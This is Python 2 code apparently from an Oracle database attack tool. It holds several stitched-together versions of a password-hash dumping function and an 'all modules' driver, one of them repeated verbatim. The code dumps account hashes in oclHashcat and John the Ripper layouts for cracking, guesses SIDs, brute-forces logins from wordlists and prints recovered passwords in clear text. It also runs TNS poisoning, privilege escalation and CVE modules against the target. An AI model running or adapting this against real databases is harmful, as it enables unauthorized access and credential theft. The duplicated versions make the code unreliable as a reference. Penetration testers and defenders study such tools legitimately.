def runPasswordsModule(args):
    '''
    Run the Passwords module

    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser() answers False
    for the options this module accepts. Otherwise every selected action is
    run in turn and the function returns None.

    args is the shared options mapping. It is read by key, and an 'info' entry
    is added when the caller has not supplied one.
    The hashes printed on success are credential material, so whatever
    captures this output ends up holding them.
    '''
    def reportHashes(outcome, failureTemplate):
        # Only a value equal to True counts as success; anything else is
        # formatted into the failure message as the error detail.
        if outcome == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            args['print'].badNews(failureTemplate.format(outcome))

    acceptedOptions = ["test-module", "info", "get-passwords", "get-passwords-from-history"]
    if checkOptionsGivenByTheUser(args, acceptedOptions) == False:
        return EXIT_MISS_ARGUMENT
    passwords = Passwords(args)
    # The value returned by connection() is not inspected by this function.
    passwords.connection(stopIfError=True)
    # dict.has_key() is Python 2 only.
    if not args.has_key('info'):
        remoteInfo = Info(args)
        remoteInfo.loadInformationRemoteDatabase()
        args['info'] = remoteInfo
    if args['test-module'] == True:
        args['print'].title("Test if hashed passwords can be got")
        passwords.testAll()
    if args['get-passwords'] == True:
        args['print'].title("Try to get Oracle hashed passwords")
        reportHashes(passwords.__tryToGetHashedPasswords__(),
                     "Impossible to get hashed passwords: {0}")
    if args['get-passwords-from-history'] == True:
        args['print'].title("Try to get Oracle hashed passwords from history")
        reportHashes(passwords.__tryToGetHashedPasswordsfromHistory__(),
                     "Impossible to get hashed passwords from history: {0}")
def runPasswordsModule(args):
    '''
    Run the Passwords module

    Gives back EXIT_MISS_ARGUMENT as soon as checkOptionsGivenByTheUser()
    answers False for this module's options. In every other case the selected
    actions run one after another and nothing is returned.

    args is the shared options mapping; an 'info' entry is stored in it when
    none is present. Hashes printed on success are credential material, so
    captured output has to be handled as such.
    '''
    moduleOptions = ["test-module", "get-passwords", "get-passwords-from-history"]
    if checkOptionsGivenByTheUser(args, moduleOptions) == False:
        return EXIT_MISS_ARGUMENT

    passwords = Passwords(args)
    # The value returned by connection() is not inspected by this function.
    passwords.connection(stopIfError=True)

    # dict.has_key() is Python 2 only.
    if not args.has_key('info'):
        remoteInfo = Info(args)
        remoteInfo.loadInformationRemoteDatabase()
        args['info'] = remoteInfo

    if args['test-module'] == True:
        args['print'].title("Test if hashed passwords can be got")
        passwords.testAll()

    if args['get-passwords'] == True:
        out = args['print']
        out.title("Try to get Oracle hashed passwords")
        outcome = passwords.__tryToGetHashedPasswords__()
        # Only a value equal to True is a success; anything else is shown as
        # the failure detail.
        if outcome == True:
            out.goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            out.badNews("Impossible to get hashed passwords: {0}".format(outcome))

    if args['get-passwords-from-history'] == True:
        out = args['print']
        out.title("Try to get Oracle hashed passwords from history")
        outcome = passwords.__tryToGetHashedPasswordsfromHistory__()
        if outcome == True:
            out.goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            out.badNews("Impossible to get hashed passwords from history: {0}".format(outcome))
def runPasswordsModule(args):
    '''
    Run the Passwords module

    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser() answers False
    for this module's options; otherwise runs each selected action and returns
    None.

    Actions, each behind its own option in args:
      test-module                 passwords.testAll()
      get-passwords               hashes for every account
      get-passwords-not-locked    hashes, passing the locked usernames as a
                                  blacklist
      get-passwords-from-history  hashes taken from the history

    The hashes are printed twice on success (plain and oclHashcat layout).
    They are credential material, so captured output has to be stored
    accordingly.
    '''
    moduleOptions = ["test-module", "get-passwords", "get-passwords-from-history", "get-passwords-not-locked"]
    if checkOptionsGivenByTheUser(args, moduleOptions) == False:
        return EXIT_MISS_ARGUMENT

    passwords = Passwords(args)
    # The value returned by connection() is not inspected by this function.
    passwords.connection(stopIfError=True)
    # Return value dropped here; the call is repeated below when the
    # not-locked option is selected.
    passwords.__getLockedUsernames__()

    # dict.has_key() is Python 2 only.
    if not args.has_key('info'):
        remoteInfo = Info(args)
        remoteInfo.loadInformationRemoteDatabase()
        args['info'] = remoteInfo

    if args['test-module'] == True:
        args['print'].title("Test if hashed passwords can be got")
        passwords.testAll()

    if args['get-passwords'] == True:
        out = args['print']
        out.title("Try to get Oracle hashed passwords")
        outcome = passwords.__tryToGetHashedPasswords__()
        # Only a value equal to True is a success; anything else is shown as
        # the failure detail.
        if outcome == True:
            out.goodNews("Here are Oracle hashed passwords (some accounts can be locked):")
            passwords.printPasswords()
            out.goodNews("Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):")
            passwords.printPasswordsOclHashcat()
        else:
            out.badNews("Impossible to get hashed passwords: {0}".format(outcome))

    if args['get-passwords-not-locked'] == True:
        out = args['print']
        out.title("Try to get Oracle hashed passwords when the account is not locked")
        lockedUsernames = passwords.__getLockedUsernames__()
        outcome = passwords.__tryToGetHashedPasswords__(lockedUsernames)
        if outcome == True:
            out.goodNews("Here are Oracle hashed passwords (all accounts are opened, not locked):")
            passwords.printPasswords()
            out.goodNews("Here are 10g Oracle hashed passwords for oclHashcat (all accounts are opened, not locked):")
            passwords.printPasswordsOclHashcat()
        else:
            out.badNews("Impossible to get hashed passwords: {0}".format(outcome))

    if args['get-passwords-from-history'] == True:
        out = args['print']
        out.title("Try to get Oracle hashed passwords from history")
        outcome = passwords.__tryToGetHashedPasswordsfromHistory__()
        if outcome == True:
            out.goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            out.badNews("Impossible to get hashed passwords from history: {0}".format(outcome))
def runAllModules(args):
    '''
    Run all modules

    Three phases:
      A) SID: use args['sid'] when given, else ask runSIDGuesserModule().
      B) Accounts: use args['user']/args['password'] when given, else search
         for valid accounts on every SID with PasswordGuesser.
      C) For every (SID, login, password) collected, connect and call
         testAll() on each module in a fixed order.

    Returns EXIT_MISS_ARGUMENT when sidHasBeenGiven() or anAccountIsGiven()
    answers False, and None after a complete run. Calls exit(EXIT_NO_ACCOUNTS)
    when the account search on a SID finds nothing.

    args is mutated: 'sid', 'user', 'password', 'info' and 'run' are written.
    Valid accounts and the password of the account under test are printed in
    clear text, so captured output has to be treated as holding credentials.
    '''
    # Maps a SID to the list of [login, password] pairs to test on it.
    connectionInformation = {}

    #A)SID MANAGEMENT
    if args['sid'] == None:
        validSIDsList = runSIDGuesserModule(args)
        # Any credentials given by the caller are dropped when the SID had to
        # be guessed, which forces the account search below.
        args['user'], args['password'] = None, None
    else:
        validSIDsList = [args['sid']]

    #B)ACCOUNT MANAGEMENT
    if args['user'] == None and args['password'] == None:
        for sid in validSIDsList:
            args['print'].title("Searching valid accounts on the {0} SID".format(sid))
            args['sid'] = sid
            passwordGuesser = PasswordGuesser(args, args['accounts-file'])
            passwordGuesser.searchValideAccounts()
            validAccountsList = passwordGuesser.valideAccounts
            if validAccountsList == {}:
                args['print'].badNews("No found a valid account on {0}:{1}/{2}".format(args['server'], args['port'], args['sid']))
                # Ends the whole run, including SIDs not searched yet.
                exit(EXIT_NO_ACCOUNTS)
            args['print'].goodNews("Accounts found on {0}:{1}/{2}: {3}".format(args['server'], args['port'], args['sid'], validAccountsList))
            for aLogin, aPassword in validAccountsList.items():
                connectionInformation.setdefault(sid, []).append([aLogin, aPassword])
    else:
        for aSid in validSIDsList:
            connectionInformation.setdefault(aSid, []).append([args['user'], args['password']])

    #C)ALL OTHERS MODULES
    if sidHasBeenGiven(args) == False:
        return EXIT_MISS_ARGUMENT
    if anAccountIsGiven(args) == False:
        return EXIT_MISS_ARGUMENT
    for aSid, accounts in connectionInformation.items():
        for aLogin, aPassword in accounts:
            args['sid'], args['user'], args['password'] = aSid, aLogin, aPassword
            # The section title carries the password in clear text.
            args['print'].title("Testing all modules on the {0} SID with the {1}/{2} account".format(args['sid'], args['user'], args['password']))
            #INFO ABOUT REMOTE SERVER
            info = Info(args)
            status = info.connection()
            if isinstance(status, Exception):
                args['print'].badNews("Impossible to connect to the remote database: {0}".format(str(status).replace('\n', '')))
                # Leaves the account loop of this SID: the remaining accounts
                # of the SID are not tried.
                break
            info.loadInformationRemoteDatabase()
            args['info'] = info
            #UTL_HTTP
            utlHttp = UtlHttp(args)
            utlHttp.connection()
            utlHttp.testAll()
            #Remaining modules, same order as before
            HttpUriType(args).testAll()
            UtlFile(args).testAll()
            Java(args).testAll()
            DbmsAdvisor(args).testAll()
            DbmsScheduler(args).testAll()
            Ctxsys(args).testAll()
            Passwords(args).testAll()
            DbmsXslprocessor(args).testAll()
            ExternalTable(args).testAll()
            #Oradbg
            oradbg = Oradbg(args)
            oradbg.testAll()
            oradbg.close() #Close the socket to the remote database
            #CVE_2012_3137
            CVE_2012_3137(args).testAll()
    #usernamelikepassword
    # NOTE(review): the listing this comes from had lost its indentation;
    # running this step once, after both loops, is a reconstruction to be
    # confirmed against the original file.
    args['run'] = True
    runUsernameLikePassword(args)
def runPasswordsModule(args):
    '''
    Run the Passwords module

    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser() answers False
    for this module's options; otherwise runs each selected action and returns
    None.

    Actions, each behind its own option in args:
      test-module                 passwords.testAll()
      get-passwords               hashes for every account
      get-passwords-not-locked    hashes, passing the locked usernames as a
                                  blacklist
      get-passwords-from-history  hashes taken from the history

    For the first two hash actions the result is printed in three layouts
    (plain, oclHashcat, John the Ripper). The hashes are credential material,
    so captured output has to be stored accordingly.
    '''
    def printAllLayouts(plainMessage, hashcatMessage, johnMessage):
        # One headline per layout, each followed by its own dump.
        out = args['print']
        out.goodNews(plainMessage)
        passwords.printPasswords()
        out.goodNews(hashcatMessage)
        passwords.printPasswordsOclHashcat()
        out.goodNews(johnMessage)
        passwords.printPasswordsJohn()

    moduleOptions = [
        "test-module",
        "get-passwords",
        "get-passwords-from-history",
        "get-passwords-not-locked",
    ]
    if checkOptionsGivenByTheUser(args, moduleOptions) == False:
        return EXIT_MISS_ARGUMENT

    passwords = Passwords(args)
    # The value returned by connection() is not inspected by this function.
    passwords.connection(stopIfError=True)
    # Return value dropped here; the call is repeated below when the
    # not-locked option is selected.
    passwords.__getLockedUsernames__()

    # dict.has_key() is Python 2 only.
    if not args.has_key('info'):
        remoteInfo = Info(args)
        remoteInfo.loadInformationRemoteDatabase()
        args['info'] = remoteInfo

    if args['test-module'] == True:
        args['print'].title("Test if hashed passwords can be got")
        passwords.testAll()

    if args['get-passwords'] == True:
        args['print'].title("Try to get Oracle hashed passwords")
        outcome = passwords.__tryToGetHashedPasswords__()
        # Only a value equal to True is a success; anything else is shown as
        # the failure detail.
        if outcome == True:
            printAllLayouts(
                "Here are Oracle hashed passwords (some accounts can be locked):",
                "Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):",
                "Here are 10g Oracle hashed passwords for John the Ripper (some accounts can be locked):",
            )
        else:
            args['print'].badNews("Impossible to get hashed passwords: {0}".format(outcome))

    if args['get-passwords-not-locked'] == True:
        args['print'].title("Try to get Oracle hashed passwords when the account is not locked")
        lockedUsernames = passwords.__getLockedUsernames__()
        outcome = passwords.__tryToGetHashedPasswords__(lockedUsernames)
        if outcome == True:
            printAllLayouts(
                "Here are Oracle hashed passwords (all accounts are opened, not locked):",
                "Here are 10g Oracle hashed passwords for oclHashcat (all accounts are opened, not locked):",
                "Here are 10g Oracle hashed passwords for John the Ripper (all accounts are opened, not locked):",
            )
        else:
            args['print'].badNews("Impossible to get hashed passwords: {0}".format(outcome))

    if args['get-passwords-from-history'] == True:
        args['print'].title("Try to get Oracle hashed passwords from history")
        outcome = passwords.__tryToGetHashedPasswordsfromHistory__()
        if outcome == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(outcome))
def runAllModules(args):
    '''
    Run all modules

    Phases:
      0) TNS poisoning check, unless args['no-tns-poisoning-check'] is set.
      A) SID: use args['sid'] when given, else ask runSIDGuesserModule().
         exit(EXIT_NO_SIDS) when the resulting list is empty.
      B) Accounts, first match wins: load them from the credentials file,
         search for them with PasswordGuesser, or use the given
         args['user']/args['password'].
      C) For every (SID, login, password) collected, connect and call
         testAll() on each module in a fixed order.

    Returns EXIT_MISS_ARGUMENT when sidHasBeenGiven() answers False, and None
    after a complete run. Calls exit(EXIT_NO_ACCOUNTS) when the account search
    on a SID finds nothing.

    args is mutated: 'sid', 'user', 'password', 'accounts-file', 'info' and
    'run' may be written.
    Valid accounts and the password of the account under test are printed, so
    captured output has to be treated as holding credentials.
    '''
    # Maps a SID to the list of [login, password] pairs to test on it.
    connectionInformation = {}

    #0)TNS poisoning
    if args['no-tns-poisoning-check'] == False:
        Tnspoison(args).testAll()
    else:
        logging.info("Don't check if the target is vulnerable to TNS poisoning because the option --no-tns-poisoning-check is enabled in command line")

    #A)SID MANAGEMENT
    if args['sid'] == None:
        logging.debug("Searching valid SIDs")
        validSIDsList = runSIDGuesserModule(args)
        # Any credentials given by the caller are dropped when the SID had to
        # be guessed.
        args['user'], args['password'] = None, None
    else:
        validSIDsList = [args['sid']]
    if validSIDsList == []:
        exit(EXIT_NO_SIDS)

    #B)ACCOUNT MANAGEMENT
    if args['credentialsFile'] == True:
        logging.debug("Loading credentials stored in the {0} file".format(args['accounts-file']))
        #Load accounts from file
        passwordGuesser = PasswordGuesser(args, args['accounts-file'], loginFile=None, passwordFile=None, loginAsPwd=args['login-as-pwd'])
        validAccountsList = passwordGuesser.getAccountsFromFile()
        for aSid in validSIDsList:
            for anAccount in validAccountsList:
                # Only the first two fields of each loaded entry are kept.
                connectionInformation.setdefault(aSid, []).append([anAccount[0], anAccount[1]])
    elif args['user'] == None and args['password'] == None:
        for sid in validSIDsList:
            args['print'].title("Searching valid accounts on the {0} SID".format(sid))
            args['sid'] = sid
            # When both a login file and a password file are given, the
            # combined accounts file is cleared.
            if args['accounts-files'][0] != None and args['accounts-files'][1] != None:
                args['accounts-file'] = None
            passwordGuesser = PasswordGuesser(
                args,
                accountsFile=args['accounts-file'],
                loginFile=args['accounts-files'][0],
                passwordFile=args['accounts-files'][1],
                timeSleep=args['timeSleep'],
                loginAsPwd=args['login-as-pwd'],
            )
            passwordGuesser.searchValideAccounts()
            validAccountsList = passwordGuesser.valideAccounts
            if validAccountsList == {}:
                args['print'].badNews("No found a valid account on {0}:{1}/{2}. You should try with the option '--accounts-file accounts/accounts_multiple.txt' or '--accounts-file accounts/logins.txt accounts/pwds.txt'".format(args['server'], args['port'], args['sid']))
                # Ends the whole run, including SIDs not searched yet.
                exit(EXIT_NO_ACCOUNTS)
            args['print'].goodNews("Accounts found on {0}:{1}/{2}: {3}".format(args['server'], args['port'], args['sid'], getCredentialsFormated(validAccountsList)))
            for aLogin, aPassword in validAccountsList.items():
                connectionInformation.setdefault(sid, []).append([aLogin, aPassword])
    else:
        for aSid in validSIDsList:
            connectionInformation.setdefault(aSid, []).append([args['user'], args['password']])

    #C)ALL OTHERS MODULES
    if sidHasBeenGiven(args) == False:
        return EXIT_MISS_ARGUMENT
    #elif anAccountIsGiven(args) == False : return EXIT_MISS_ARGUMENT
    for aSid, accounts in connectionInformation.items():
        for aLogin, aPassword in accounts:
            args['sid'], args['user'], args['password'] = aSid, aLogin, aPassword
            # The section title carries the password in clear text.
            args['print'].title("Testing all modules on the {0} SID with the {1}/{2} account".format(args['sid'], args['user'], args['password']))
            #INFO ABOUT REMOTE SERVER
            info = Info(args)
            status = info.connection()
            if isinstance(status, Exception):
                args['print'].badNews("Impossible to connect to the remote database: {0}".format(str(status).replace('\n', '')))
                # Leaves the account loop of this SID: the remaining accounts
                # of the SID are not tried.
                break
            info.loadInformationRemoteDatabase()
            args['info'] = info
            #UTL_HTTP
            utlHttp = UtlHttp(args)
            utlHttp.connection()
            utlHttp.testAll()
            #Remaining modules, same order as before
            HttpUriType(args).testAll()
            UtlFile(args).testAll()
            Java(args).testAll()
            DbmsAdvisor(args).testAll()
            DbmsScheduler(args).testAll()
            Ctxsys(args).testAll()
            Passwords(args).testAll()
            DbmsXslprocessor(args).testAll()
            ExternalTable(args).testAll()
            Oradbg(args).testAll()
            DbmsLob(args).testAll()
            SMB(args).testAll()
            #Privilege escalation
            PrivilegeEscalation(args).testAll()
            #Test some CVE
            cve = CVE_XXXX_YYYY(args)
            cve.testAll()
            cve.close() #Close the socket to the remote database
            #CVE_2012_3137
            CVE_2012_3137(args).testAll()
    #usernamelikepassword
    # NOTE(review): the listing this comes from had lost its indentation;
    # running this step once, after both loops, is a reconstruction to be
    # confirmed against the original file.
    args['run'] = True
    runUsernameLikePassword(args)
def runAllModules(args):
    '''
    Run all modules

    Phases:
      0) TNS poisoning check, unless args['no-tns-poisoning-check'] is set.
      A) SID: use args['sid'] when given, else ask runSIDGuesserModule().
         exit(EXIT_NO_SIDS) when the resulting list is empty.
      B) Accounts, first match wins: load them from the credentials file,
         search for them with PasswordGuesser, or use the given
         args['user']/args['password'].
      C) For every (SID, login, password) collected, connect and call
         testAll() on each module in a fixed order.

    Returns EXIT_MISS_ARGUMENT when sidHasBeenGiven() answers False, and None
    after a complete run. Calls exit(EXIT_NO_ACCOUNTS) when the account search
    on a SID finds nothing.

    args is mutated: 'sid', 'user', 'password', 'accounts-file', 'info' and
    'run' may be written.
    Valid accounts and the password of the account under test are printed, so
    captured output has to be treated as holding credentials.
    '''
    # Maps a SID to the list of [login, password] pairs to test on it.
    connectionInformation = {}

    #0)TNS poisoning
    if args['no-tns-poisoning-check'] == False:
        Tnspoison(args).testAll()
    else:
        logging.info("Don't check if the target is vulnerable to TNS poisoning because the option --no-tns-poisoning-check is enabled in command line")

    #A)SID MANAGEMENT
    if args['sid'] == None:
        logging.debug("Searching valid SIDs")
        validSIDsList = runSIDGuesserModule(args)
        # Any credentials given by the caller are dropped when the SID had to
        # be guessed.
        args['user'], args['password'] = None, None
    else:
        validSIDsList = [args['sid']]
    if validSIDsList == []:
        exit(EXIT_NO_SIDS)

    #B)ACCOUNT MANAGEMENT
    if args['credentialsFile'] == True:
        logging.debug("Loading credentials stored in the {0} file".format(args['accounts-file']))
        #Load accounts from file
        passwordGuesser = PasswordGuesser(args, args['accounts-file'], loginFile=None, passwordFile=None, loginAsPwd=args['login-as-pwd'])
        validAccountsList = passwordGuesser.getAccountsFromFile()
        for aSid in validSIDsList:
            for anAccount in validAccountsList:
                # Only the first two fields of each loaded entry are kept.
                connectionInformation.setdefault(aSid, []).append([anAccount[0], anAccount[1]])
    elif args['user'] == None and args['password'] == None:
        for sid in validSIDsList:
            args['print'].title("Searching valid accounts on the {0} SID".format(sid))
            args['sid'] = sid
            # When both a login file and a password file are given, the
            # combined accounts file is cleared.
            if args['accounts-files'][0] != None and args['accounts-files'][1] != None:
                args['accounts-file'] = None
            passwordGuesser = PasswordGuesser(
                args,
                accountsFile=args['accounts-file'],
                loginFile=args['accounts-files'][0],
                passwordFile=args['accounts-files'][1],
                timeSleep=args['timeSleep'],
                loginAsPwd=args['login-as-pwd'],
            )
            passwordGuesser.searchValideAccounts()
            validAccountsList = passwordGuesser.valideAccounts
            if validAccountsList == {}:
                args['print'].badNews("No found a valid account on {0}:{1}/{2}. You should try with the option '--accounts-file accounts/accounts_multiple.txt' or '--accounts-file accounts/logins.txt accounts/pwds.txt'".format(args['server'], args['port'], args['sid']))
                # Ends the whole run, including SIDs not searched yet.
                exit(EXIT_NO_ACCOUNTS)
            args['print'].goodNews("Accounts found on {0}:{1}/{2}: {3}".format(args['server'], args['port'], args['sid'], getCredentialsFormated(validAccountsList)))
            for aLogin, aPassword in validAccountsList.items():
                connectionInformation.setdefault(sid, []).append([aLogin, aPassword])
    else:
        for aSid in validSIDsList:
            connectionInformation.setdefault(aSid, []).append([args['user'], args['password']])

    #C)ALL OTHERS MODULES
    if sidHasBeenGiven(args) == False:
        return EXIT_MISS_ARGUMENT
    #elif anAccountIsGiven(args) == False : return EXIT_MISS_ARGUMENT
    for aSid, accounts in connectionInformation.items():
        for aLogin, aPassword in accounts:
            args['sid'], args['user'], args['password'] = aSid, aLogin, aPassword
            # The section title carries the password in clear text.
            args['print'].title("Testing all modules on the {0} SID with the {1}/{2} account".format(args['sid'], args['user'], args['password']))
            #INFO ABOUT REMOTE SERVER
            info = Info(args)
            status = info.connection()
            if isinstance(status, Exception):
                args['print'].badNews("Impossible to connect to the remote database: {0}".format(str(status).replace('\n', '')))
                # Leaves the account loop of this SID: the remaining accounts
                # of the SID are not tried.
                break
            info.loadInformationRemoteDatabase()
            args['info'] = info
            #UTL_HTTP
            utlHttp = UtlHttp(args)
            utlHttp.connection()
            utlHttp.testAll()
            #Remaining modules, same order as before
            HttpUriType(args).testAll()
            UtlFile(args).testAll()
            Java(args).testAll()
            DbmsAdvisor(args).testAll()
            DbmsScheduler(args).testAll()
            Ctxsys(args).testAll()
            Passwords(args).testAll()
            DbmsXslprocessor(args).testAll()
            ExternalTable(args).testAll()
            Oradbg(args).testAll()
            DbmsLob(args).testAll()
            SMB(args).testAll()
            #Privilege escalation
            PrivilegeEscalation(args).testAll()
            #Test some CVE
            cve = CVE_XXXX_YYYY(args)
            cve.testAll()
            cve.close() #Close the socket to the remote database
            #CVE_2012_3137
            CVE_2012_3137(args).testAll()
    #usernamelikepassword
    # NOTE(review): the listing this comes from had lost its indentation;
    # running this step once, after both loops, is a reconstruction to be
    # confirmed against the original file.
    args['run'] = True
    runUsernameLikePassword(args)